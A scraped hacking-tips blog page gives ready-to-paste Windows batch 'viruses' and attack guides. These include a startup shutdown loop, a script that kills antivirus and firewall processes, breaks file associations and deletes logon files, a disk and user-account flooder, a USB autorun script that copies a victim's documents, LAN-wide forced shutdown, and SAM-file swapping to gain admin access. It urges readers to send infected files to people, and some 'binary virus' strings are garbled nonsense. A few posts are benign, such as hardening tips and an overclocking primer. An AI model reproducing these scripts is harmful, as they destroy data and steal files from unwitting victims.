Menu

Virus on Startup

Warning!!!!  
This virus is very dangerous so i never recommend you to run these viruses on your system.
 
Using this post you can add your own created viruses into start ups this will make it difficult to detect them and to remove them ...

1) For this u can use the simple code below ..

       @echo off
       copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 

and  then rest of the code ..

2) Suppose u want to make a shutdown.bat a virus which will copy itself in start up n whenever computer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..

        @echo off
        copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

       @echo off
        shutdown -s -t 5 -c "Shutdown"

save it as abcd.bat when ever u will run it it will be saved in ur start ups..

here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle ..
Read more ...

Changing Associations

This Virus will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

                                
Steps to do this are:-
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
3. Now just save this file as installhack.bat ( Remember the .bat is really important so do put it)
Read more ...

Formating the sytem drive

             
A simple binary codes Virus that can format the system drive, secondary drives :-
1) Copy The Following In Notepad Exactly as it
         01001011000111110010010101010101010000011111100000
2) Save As An EXE Any Name Will Do

3) Send the EXE to People And Infect


Some other interesting formatting codes...
  • format c:\ /Q/X — this will format your drive c:\

    01100110011011110111001001101101011000010111010000 100000011000110011101001011100
    0010000000101111010100010010111101011000
     
  • format d:\ /Q/X — this will format your dirve d:\

    01100110011011110111001001101101011000010111010000 100000011001000011101001011100

    0010000000101111010100010010111101011000

  • format a:\ /Q/X — this will format your drive a:\

    01100110011011110111001001101101011000010111010000 100000011000010011101001011100

    0010000000101111010100010010111101011000

  • del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

    01100100011001010110110000100000001011110100011000 101111010100110010111101010001

    00100000011000110011101001011100011000100110111101 101111011101000010111001101001

    0110111001101001
Read more ...

Hard drive eater

Warning!!!!
This virus is very dangerous so i never recommend you to run these viruses on your system.

This virus is also know as hard disk space eater virus.the virus will keep replicating itself until your hard drive is totally full and will destroy your comp.
                                
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.

@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
3. Now just save this file as flood1.bat ( Remember the .bat is really important so do put it)
Read more ...

Shut Down All Computers on LAN

I am Not Talking About To Shutting Down by Removing Power Supply. Instead You can Shut Down All With The help of A small Software Known As Angry IP Scanner. So Lets Start.

Now what to do
  1. Find Out Your Ip address By ipconfig Command or going through this link http://www.whatismyip.com/
  2. Now install angry ip scanner at the last computer You are Sitting.
  3. When scanner is install run the angry ip scanner. You can Also Give IP ranges. If Your Ip Is 10.0.2.01 Then You Can Give Range From 10.0.2.16 (assuming there are 16 computers on your LAN) . You can Also Give More Range According To Your Need. Now Click On Start And start Scanning.
    After Scanning is Completed You will See A list of connected Computers.Don't close Angry Ip Scanner and move on to next step.

  4. After That Go to Run and write "shutdown -i" Command.without Quotes!!!
    You will See A window Like This.
  5. Click On Add and Type Computer Name Or Ip Address In the Computer name Dialouge Box.

    Note: Write The IP address of Computers Which We found Live in Scanning With Angry Ip Scanner.
  6. Now After That You have to Select "Shutdown" Options From The list.
    Uncheck The "warn Users Of the action"
  7. Lastly You have to write Something In the Comment Field.
    Don't leave Comment Field Empty it will Note work If You do so.
  8. After that Click 'OK'
Bingo..Done!!! . :)
Do it For All Computers which Attached
Read more ...

NTFS Recovery System

Did you know that you can use Alternate Data Streams for New Technology File System Recovery and to hide NTFS Files? 

This data recovery / hiding works with Windows NT and XP, is easy to do, yet most seasoned network technicians are unaware of this ability!

What is an Alternate Data Stream and how does it impact NTFS Recovery?

Simply put, it's the ability to hide data behind a file, such as text, graphics or executable code. This could include games, trojans, graphics and more and is used by hackers around the world. NTFS Recovery can uncover these hidden files.

For example: You could have a small text file (hello.txt of say 1k in size) - however, attached to it is an executable program that is 5 megs in size. When you do a directory listing (look for files on your pc), the system will show you a small 1k text file without revealing the 5 meg file.

NTFS Recovery and Data Streams Key Issues.

Malicious users take advantage of this by storing a virus or trojan on your system. Employees can abuse this by hiding graphics or data behind innocent text files, or the popular 0.log file.

* Streams are only visible to specialized software.
* Public awareness of NTFS Recovery using streams is very low.
* Streams can hide themselves behind directories as well as files to avoid standard NTFS Recovery.
* Disk space used by Streams are not reported by programs such as Windows Explorer or commands such as 'DIR'
* Streams can be executed!
* Executed streams do not have their filenames displayed correctly in Windows Task Manager.

NTFS Recovery - Test it by creating an ADS (text example)
The syntax used to create the Stream is relatively simple and straightforward. To create an ADS associated with the file "hello.txt", simply separate the default stream name from the ADS name with a colon. [This example is from the command prompt of your C drive].
c:\>echo This is a test > hello.txt:hidden

NTFS Recovery of the ADS can then be verified using Notepad. c:\>notepad hello.txt:hidden

Using the DIR command or programs such as Windows Explorer will prove that the NTFS file is hidden and will not be able to detect the presence of this newly created Alternate Data Stream.

NTFS Recovery - Test it by creating an ADS (executable example)
c:\>type c:\winnt\notepad.exe > hello.txt:np.exe
c:\>type c:\winnt\system32\sol.exe > hello.txt:sol2.exe

Similarly, image files, audio files, or any other stream of data can be hidden in ADSs
Read more ...

What is SAM File?

The Security Accounts Manager (SAM) is a database stored as a registry file in Windows NT, Windows 2000, and later versions of Windows. It stores users' passwords in a hashed format (in an LM hash and an NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords.

In an attempt to improve the security of the SAM database against offline software cracking, Microsoft introduced the SYSKEY function in Windows NT 4.0. When SYSKEY is enabled, the on-disk copy of the SAM file is partially encrypted, so that the password hash values for all local accounts stored in the SAM are encrypted with a key (usually also referred to as the "SYSKEY").

In the case of online attacks, it is not possible to simply copy the SAM file to another location. The SAM file cannot be moved or copied while Windows is running, since the Windows kernel obtains and keeps an exclusive filesystem lock on the SAM file, and will not release that lock until the operating system has shut down or a blue screen exception has been thrown. However, the in-memory copy of the contents of the SAM can be dumped using various techniques, making the password hashes available for offline brute-force attack.

Removing LM Hash

Most versions of Windows can be configured to disable the creation and storage of valid LM hashes when the user changes their password. This is the default setting in Windows Vista, but was disabled by default in previous versions of Windows. Note: enabling this setting does not immediately clear the LM hash values from the SAM, but rather enables an additional check during password change operations that will instead store a "dummy" value in the location in the SAM database where the LM hash is otherwise stored. (This dummy value has no relationship to the user's password - it is the same value used for all user accounts.]
As well, LM hashes cannot be calculated when the user chooses a password of over 14 characters in length. Thus, when a user (or administrator) sets a password of 15 characters or longer, the LM hash value is set to a "dummy" value, which is not valid for authentication purposes. 

Create Administrator like account

This article introduce very simple way to get Administrator like account and do the job and after finish recover your way, after that Get Admin Password later in your home by Cracking, After get the Admin Password Create a hidden user account and do all your jobs free, and Explain how to make a USB Storage Device Bootable corresponding to any system boot, and how to bypass Mother Board password by Default Passwords, and how to extract it if you are in the system
                        
Close Look to hole
Microsoft stores all Security Information in many files but the main file is the SAM file (Security Accounts Manager)! this file contain critical information about users account you can explore the folder
                      $windir$\system32\config

Dose Microsoft Know and Why!?

Yes Microsoft Know all things, and done on purpose why? I always for many years ask my self why Microsoft doesn’t do real security on their systems from the CD setup to all security aspects In the system, I found(my opinion may wrong)that they need to achieve 2 strategic things
1- They need their software spread and all depend on it and in one day when they feel that they are the One The security will done and all money will go to One Pocket
2- They Forced/Like to Make Some Organizations Hack other systems

Proof:
They can make this File SAM Unavailable by storing the information in FAT, FAT32, NTFS Areas (Sectors reserved by The Operating SYSTEM to Store the Addresses of the files on the HardDisk File Allocation Table) So that it is hard to extract. But they don't!!!!!

Why we need NTFS ?
If the Partition of the Windows System is NTFS so with normal Startup you will not be able to access any files because the File System is not Recognized by MS-DOS when we install NTFSDOS Professional on the bootable disk it will allow you To Access any File Under NTFS

Understand the Idea


The SAM file contains a Security Information, when windows launches it enters directly to the system without asking about any password and windows will store this Account in The SAM file on PC. So the SAM file on PC contain an Account which will make you enter Directly to the Windows, so take your SAM File and Replace (by renaming, we will need the original file to recover our way) It with the other SAM File in The Other System or Machine So When you restart It will make you enter directly to the Windows With Administrator Like Account ,do what you need and then back all things to the previous state. All These Steps will be under other system bootable DOS, Knoppiex, Windows Live CD, Because Windows will not make u able to copy the Files

After you get the SAM File and System File there are Programs That extract the Accounts and their passwords, depending on the idea of cracking the HASH (the HASH is one way encryption method) so that The program will generate random passwords and convert them to HASH and then compare it with the HASHES in the SAM File
Read more ...

Clean temporary files

To make a really cool batch file that can delete your temporary files when once clicked. You can also do this by using various software like CCleaner but if you want to know how they work, simply copy and paste the following code into notepad and then save it as a .bat file.
                                 
Here are the steps:-
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.

@echo off
del /s /f /q c:\windows\temp\*.*
rd /s /q c:\windows\temp
md c:\windows\temp
del /s /f /q C:\WINDOWS\Prefetch
del /s /f /q %temp%\*.*
rd /s /q %temp%
md %temp%
cls

3. Now just save this file as Clean.bat ( Remember the .bat is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.

Read more ...

Hide Change Password Page In Windows

When this setting is enabled, users are no longer able to access the Change Passwords page

Follow these steps to do this:-
1). Type regedit in run.
2). Navigate to the HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\System directory in the Registry
3). Then alter the key NoPwdPage
4). Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled)
Read more ...

Create a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don’t want to log off?

You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver.
To create a shortcut on your desktop to lock your computer:
1). Right-click the desktop.
2). Point to New, and then click Shortcut. The Create Shortcut Wizard opens.
3). In the text box, type the following: rundll32.exe user32.dll,LockWorkStation 4). Click Next. Enter a name for the shortcut. You can call it “Lock Workstation” or choose any name you like.
5). Click Finish. You can also change the shortcut’s icon (my personal favorite is the padlock icon in shell32.dll).
6). To change the icon: Right click the shortcut and then select Properties.
7). Click the Shortcut tab, and then click the Change Icon button.
8). In the Look for icons in this file text box, type: Shell32.dll. Click OK.
9). Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L.

This would save you only one keystroke from the normal command, but it could be more convenient.
Read more ...

Automatically Kill Programs At Shutdown

Don’t you hate it when, while trying to shut down, you get message boxes telling you that a program is still running?

Making it so that Windows automatically kills applications running is a snap.

Follow these steps to override this messages:-
1). Type regedit in run.
2). Navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry
3). Then alter the key AutoEndTasks to the value 1.
Read more ...

No Shutdown

                                 
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!

Settings:

1] go to Start> Run
2] Enter regedit and hit Enter...
3] Go to this path:-
HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion > Explorer
4] Set this value:- “NoClose”=”DWORD:1″
Read more ...

How To Make A Virus Message Box

I'm going to teach you how to make a message box. All you need is Notepad. If you have any comments, feel free to post them. Just start learning and have fun!

 First, open Notepad and type this:

x=msgbox(box text,buttons,box title)

On the part where it says "box text", type the text you want on the window (with quotation marks). On the "box title", type the title of the message box the same way you typed the text. On "buttons" type a number (without quotation marks):

0: Normal message box
1: OK and Cancel
2: Abort, Retry, Ignore
3: Yes, No, Cancel
4: Yes and No
5: Retry and Cancel
16: Critical message icon
32: Warning query icon
48: Warning message icon
64: Information message icon
4096: Always stay on top of the desktop

 Example:
  x=msgbox("You are so infected",32,"Fake Virus 2012")

When you're done, save it as a VBS(or VBScript)file. To do this, type ".vbs" at the end of the title and change the "Text Document (*txt)" in the "Save as type" select box to "All Files" .

Example:
 File name: Fake_Virus.vbs
Save as type: All Files"
Read more ...

How to Protect against Hackers Attack

Hackers and Browser Hijacking is one area of the Net that affects everyone at some stage.

In addition to having third party utilities such as SpyBot, Anti Virus scanners and firewalls installed there are some changes that can be made to Windows 2000/XP. Below are some details to make your system safer from hackers and hijackers.

Some of these tips require editing of the Registry so it is wise to either backup the registry and/or create a Restore Point.

1.Clearing the Page File at Shutdown

Windows 2000/XP paging file (Sometimes called the Swap File) can contain sensitive information such as plaintext passwords. Someone capable of accessing your system could scan that file and find its information. You can force windows to clear out this file.

In the registry navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSe ssion ManagerMemory Management and add or edit the DWORD ClearPageFileAtShutdown. Set it to 1.

Note that when you do this, the system will take much longer to shut down: a system with a really big Page File (! Gig or more) may take a minute or two longer.

2.Disable the POSIX and OS/2 Subsystem.
Windows 2000 and XP come with little-documented subsystems it at allow compatibility with UNIX and OS/2 systems These rues systems are enabled by default but so rarely used that they are best off bring disabled completely to prevent possible service hijackings.

To disable these subsystems, open the registry and navigate to HKEY LOCAL MACHINESYSTEMCurrentControlSetControlSession ManagerSubSystems. Delete the subkeys Os2 and Posix. then reboot.


3.Never leave default passwords blank.
On installation, Windows 2000 sets up an Administrator account with total system access and prompts for a password. Guess what: by default, it allows that password to be blank. If a user doesn't want to type a password, he can simply click Next and the system will be an open door for anyone who wants to log on. Always opt for a password of some kind when setting up the default account on a machine.


4.Disable the Guest account

Windows XP comes with a Guest account that's used for limited access, but it's still possible to do some damage with it. Disable it completely if you are not using it. Under Control Panel, select User Accounts, click on Guest Account and then select Turn Off the Guest Account.


5. Install Windows In a different directory.


Windows usually installs itself in the WINDOWS directory. Windows NT 4 0 and 2000 Will opt for WINNT. Many worms and other rogue programs assume this to be the case and attempt to exploit those folders files. To defeat this install Windows to another directory when you're setting it up - you can specify the name of the directory during setup. WINDIR is okay; so some people use WNDWS - A few (not that many) programs may not install properly if you install Windows to another folder but t hey are very few and they are far between

6. Fake out hackers with a dummy Administrator account


Since the default account in Windows 2000 is always named Administrator, an enterprising hacker can try to break into your system by attempting to guess the password on that account. It you never bothered to put a password on that account, say your prayers.

Rather than be a sucker to a hacker, put a password on the Administrator account it you haven't done so already. Then change the name of the Administrator account. You'll still be able to use the account under its new name, since Windows identifies user accounts by a back-end ID number rather than the name. Finally, create a new account named Administrator and disable it. This should frustrate any would -be break-ins.

You can add new accounts and change the names of existing accounts in Windows 2000 through the Local Users and Groups snap in. Right-click on My Computer, select Manager, open the Local Users and Groups subtree, look in the Users folder and right-click on any name to rename it. To add a new user, right-click on the containing folder and select New User. Finally, to disable an account, double-click it, check the Account is disabled box and click OK.
Don't ever delete the original Administrator account. Some programs refuse to install without it and you might have to log in under that account at some point to setup such software. The original Administrator account is configured with a security ID that must continue to be present in the system.

7. Set the Hosts file to read-only to prevent name hijacking.

This one's from (and to a degree, for) the experts. The HOSTS file is a text file that all flavors of Windows use to hold certain network addresses that never change. When a network name and address is placed in HOSTS, the computer uses the address listed there for that network name rather than performing a lookup (which can take time). Experts edit this file to place their most commonly-visited sites into it, speeding things up considerably.

Unfortunately hijackers and hackers also love to put their own information into it - redirecting people from their favorite sites to places they don't want to go. One of the most common entries in HOSTS is local host which is set 1770.0.1. This refers to the local machine and if this entry is damaged the computer can behave very unpredictably.

To prevent HOSTS from being hijacked, set it to read-only. Go to the folder %Systemroot%system32driversetc, right-click on HOSTS, select Properties check the Read-Only box and click OK. If you want to add your own entries to HOSTS, you can unprotect it before doing so, but always remember to set it to read-only after you're done.

8. Turn off unneeded Services

Windows 2000 and XP both come with many background services that don't need to he running most of the time: Alerter, Messenger, Server (If you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry, Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host.

9. Disallow changes to IE settings through IE


This is another anti hijacker tip. IE can be set so that any changes to its settings must be performed through the Internet icon in the Control Panel, rather than through IE's own interface. Some particularly unscrupulous programs or sites try to tamper with setting by accessing the Tools, Options menu in IE. You can disable this and still make changes to IE's settings through the Control Panel.

Open the Registry and browse to HKEY_CURRENT_USER SoftwarePoliciesMicrosoftInternet ExplorerRestrictions. Create or edit a new DWORD value named NoBrowserUptions and set it to 1 (this is a per-user setting). Some third-party programs such as Spybot Search And Destroy allow you to toggle this setting.

You can also keep IE from having other programs rename its default startup page, another particularly annoying form of hijacking. Browse to HKEY.CURRENT USERSoftwarePolicies MicrosoftInternet ExploreControl Panel and add or edit a DWORD, Homepage and set it to 1.

10. Disable simple FileShares


In Windows XP Professional, the Simple File Sharing mode is easily exploited, since it a little too easy to share out a file across your LAN (or the NET at large). To turn it off, go m My Computer, click Tools, Folder Option and the View tab, and uncheck Use Simple file sharing (Recommended). Click OK. When you do this you can access the Security tab in the Properties window for all folders; set permissions for folders; and take ownership of objects (but not in XP Home)
Read more ...

How to Steal people files using usb drive

                            
I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:
@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit

:ERROR
exit
What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real copying work goes o.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier

he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying.
Another thing is that it determines the windows by searching the file users and Documents and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.
Read more ...

What is Overclocking?


What is Overclocking?
Overclocking is the process of making various components of your computer run at faster speeds than they do when you first buy them. For instance, if you buy a Pentium 4 3.2GHz processor, and you want it to run faster, you could overclock the processor to make it run at 3.6GHz.


               

¡Disclaimer!
WARNING: Overclocking can F up your stuff. Overclocking wares down the hardware and the life-expectancy of the entire computer will be lowered if you overclock. If you attempt to overclock, apnahackworld.blogspot.com and its inhabitants are not responsible for anything broken or damaged when using this guide.
This guide is merely for those who accept the possible outcomes of this overclocking guide/FAQ, and overclocking in general.

Why would you want to overclock? Well, the most obvious reason is that you can get more out of a processor than what you payed for. You can buy a relatively cheap processor and overclock it to run at the speed of a much more expensive processor. If you're willing to put in the time and effort, overclocking can save you a bunch of money in the future or, if you need to be at the bleeding edge like me, can give you a faster processor than you could possibly buy from a store

The Dangers of Overclocking
First of all, let me say that if you are careful and know what you are doing, it will be very hard for you to do any permanent damage to your computer by overclocking. Your computer will either crash or just refuse to boot if you are pushing the system too far. It's very hard to fry your system by just pushing it to it's limits.

There are dangers, however. The first and most common danger is heat. When you make a component of your computer do more work than it used to, it's going to generate more heat. If you don't have sufficient cooling, your system can and will overheat. By itself, overheating cannot kill your computer, though. The only way that you will kill your computer by overheating is if you repeatedly try to run the system at temperatures higher than recommended. As I said, you should try to stay under 60 C.

Don't get overly worried about overheating issues, though. You will see signs before your system gets fried. Random crashes are the most common sign. Overheating is also easily prevented with the use of thermal sensors which can tell you how hot your system is running. If you see a temperature that you think is too high, either run the system at a lower speed or get some better cooling. I will go over cooling later in this guide.

The other "danger" of overclocking is that it can reduce the lifespan of your components. When you run more voltage through a component, it's lifespan decreases. A small boost won't have much of an affect, but if you plan on using a large overclock, you will want to be aware of the decrease in lifespan. This is not usually an issue, however, since anybody that is overclocking likely will not be using the same components for more than 4-5 years, and it is unlikely that any of your components will fail before 4-5 years regardless of how much voltage you run through it. Most processors are designed to last for up to 10 years, so losing a few of those years is usually worth the increase in performance in the mind of an overclocker.

The Basics
To understand how to overclock your system, you must first understand how your system works. The most common component to overclock is your processor.

When you buy a processor, or CPU, you will see it's operating speed. For instance, a Pentium 4 3.2GHz CPU runs at 3.2GHz, or 3200 MHz. This is a measurement of how many clock cycles the processor goes through in one second. A clock cycle is a period of time in which a processor can carry out a given amount of instructions. So, logically, the more clock cycles a processor can execute in one second, the faster it can process information and the faster your system will run. One MHz is one million clock cycles per second, so a 3.2GHz processor can go through 3,200,000,000, or 3 billion two hundred million clock cycles in every second. Pretty amazing, right?

The goal of overclocking is to raise the GHz rating of your processor so that it can go through more clock cycles every second. The formula for the speed of your processor if this:

FSB (in MHz) x Multiplier=Speed in MHz.

Now to explain what the FSB and Multiplier are:

The FSB (or, for AMD processors, the HTT*), or Front Side Bus, is the channel through which your entire system communicates with your CPU. So, obviously, the faster your FSB can run, the faster your entire system can run.

CPU manufacturers have found ways to increase the effective speed of the FSB of a CPU. They simply send more instructions in every clock cycle. So instead of sending one instruction every one clock cycle, CPU manufacturers have found ways to send two instructions per clock cycle (AMD CPUs) or even four instructions per clock cycle (Intel CPUs). So, when you look at a CPU and see it's FSB speed, you must realize that it is not really running at that speed. Intel CPUs are "quad pumped", meaning they send 4 instructions per clock cycle. This means that if you see an FSB of 800MHz, the underlying FSB speed is really only 200MHz, but it is sending 4 instructions per clock cycle so it achieves an effective speed of 800MHz. The same logic can be applied to AMD CPUs, but they are only "double pumped", meaning they only send 2 instructions per clock cycle. So an FSB of 400MHz on an AMD CPU is comprised of an underlying 200MHz FSB sending 2 instructions per clock cycle.

This is important because when you are overclocking, you will be dealing with the real FSB speed of the CPU, not the effective CPU speed.

The multiplier portion of the speed equation is nothing more than a number that, when multiplied by the FSB speed, will give you the total speed of the processor. For instance, if you have a CPU that has a 200MHz FSB (real FSB speed, before it is double or quad pumped) and has a multiplier of 10, then the equation becomes:

(FSB) 200MHz x (Multiplier) 10= 2000MHz CPU speed, or 2.0GHz.

On some CPUs, such as the Intel processors since 1998, the multiplier is locked and cannot be changed. On others, such as the AMD Athlon 64 processors, the multiplier is "top locked", which means that you can change the multiplier to a lower number but cannot raise it higher than it was originally. On other CPUs, the multiplier is completely unlocked, meaning you can change it to any number that you wish. This type of CPU is an overclockers dream, since you can overclock the CPU simply by raising the multiplier, but is very uncommon nowadays.

It is much easier to raise or lower the multiplier on a CPU than the FSB. This is because, unlike the FSB, the multiplier only effects the CPU speed. When you change the FSB, you are really changing the speed at which every single component of your computer communicates with your CPU. This, in effect, is overclocking all of the other components of your system. This can bring about all sorts of problems when other components that you don't intend to overclock are pushed too far and fail to work. Once you understand how overclocking works, though, you will know how to prevent these issues.

*On AMD Athlon 64 CPUs, the term FSB is really a misnomer. There is no FSB, per se. The FSB is integrated into the chip. This allows the FSB to communicate with the CPU much faster than Intel's standard FSB method. It also can cause some confusion, since the FSB on an Athlon 64 can sometimes be referred to as the HTT. If you see somebody talking about raising the HTT on an Athlon 64 CPU and is talking about speeds that you recognize as common FSB speeds, then just think of the HTT as the FSB. For the most part, they function in the same way and can be treated the same and thinking of the HTT as the FSB can eliminate some possible confusion.


How to Overclock
So now you understand how a processor gets it's speed rating. Great, but how do you raise that speed?

Well, the most common method of overclocking is through the BIOS. The BIOS can be reached by pressing a variety of keys while your system is booting up. The most common key to get into the BIOS is the Delete key, but others may be used such as F1, F2, any other F button, Enter, and some others. Before your system starts loading Windows (or whatever OS you have), it should have a screen that will tell you what button to use at the bottom.

Once you are in the BIOS, assuming that you have a BIOS that supports overclocking*, you should have access to all of the settings needed to overclock your system. The settings that you will most likely be adjusting are:

Multiplier, FSB, RAM Timings, RAM Speed, and RAM Ratio.

On a very basic level, all you are trying to do is to get the highest FSB x Multiplier formula that you can achieve. The easiest way to do this is to just raise the multiplier, but that will not work on most processors since the multiplier is locked. The next method is to simply raise the FSB. This is pretty self explanatory, and all of the RAM issues that have to be dealt with when raising the FSB will be explained below. Once you've found the speed at which the CPU won't go any faster, you have one more option.

If you really want to push your system to the limit, you can try lowering the multiplier in order to raise the FSB even higher. In order to understand this, imagine that you have a 2.0GHz processor that has a 200MHz FSB and a 10x multiplier. So 200MHz x 10=2.0GHz. Obviously, that equation works, but there are other ways to get to 2.0GHz. You could raise the multiplier to 20 and lower the FSB to 100MHz, or you could raise the FSB to 250MHz and lower the multiplier to 8. Both of those combinations would give you the same 2.0GHz that you started out with. So both of those combinations should give you the same system performance, right?

Wrong. Since the FSB is the channel through which your system communicates with your processor, you want it to be as high as possible. So if you lowered the FSB to 100MHz and raised the multiplier to 20, you would still have a clock speed of 2.0GHz, but the rest of the system would be communicating with your processor much slower than before resulting in a loss in system performance.

Ideally, you would want to lower the multiplier in order to raise the FSB as high as possible. In principle, this sounds easy, but it gets complicated when you involve the rest of the system, since the rest of the system is dependent on the FSB as well, chiefly the RAM. Which leads me to the next section on RAM.

*Most retail computer manufacturers use motherboards and BIOSes that do not support overclocking. You won't be able to access the settings you need from the BIOS. There are utilities that will allow you to overclock from your desktop, such as this one, but I don't recommend them since I have never tried them out myself.


RAM and what it has to do with Overclocking
First and foremost, I consider this site to be the Holy Grail of RAM information. Learn to love it

As I said before, the FSB is the pathway through which your system communicates with your CPU. So raising the FSB, in effect, overclocks the rest of your system as well.

The component that is most affected by raising the FSB is your RAM. When you buy RAM, it is rated at a certain speed. I'll use the table from my post to show these speeds:
Quote:
PC-2100 - DDR266
PC-2700 - DDR333
PC-3200 - DDR400
PC-3500 - DDR434
PC-3700 - DDR464
PC-4000 - DDR500
PC-4200 - DDR525
PC-4400 - DDR550
PC-4800 - DDR600

